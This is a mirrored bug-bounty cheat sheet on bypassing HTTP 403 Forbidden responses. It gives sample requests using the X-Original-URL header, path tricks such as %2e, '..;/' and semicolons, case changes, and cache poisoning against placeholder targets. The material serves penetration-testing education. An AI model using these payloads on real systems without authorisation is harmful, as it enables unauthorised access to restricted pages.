ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-20 03:16:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
1c6a3a3aba
AllAboutBugBounty/Bypass/Bypass 403.md
Muhammad Daffa 338475aee1 Major Update, adding some tips
2021-07-21 22:38:57 +07:00

73 lines
1.2 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 403 Forbidden Bypass
## Tools
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
## Exploit
1. Using "X-Original-URL" header
```
GET /admin HTTP/1.1
Host: target.com
```
Try this to bypass
```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
2. Appending **%2e** after the first slash
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/%2e/admin => 200
```
3. Try add dot (.) slash (/) and semicolon (;) in the URL
```
http://target.com/admin => 403
```
Try this to bypass
```
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
```
4. Add "..;/" after the directory name
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/admin..;/
```
5. Try to uppercase the alphabet in the url
```
http://target.com/admin
```
Try this to bypass
```
http://target.com/aDmIN
```
6. Via Web Cache Poisoning
```
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
```
Source:
- [@iam_j0ker](https://twitter.com/iam_j0ker)
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
Reference in New Issue View Git Blame Copy Permalink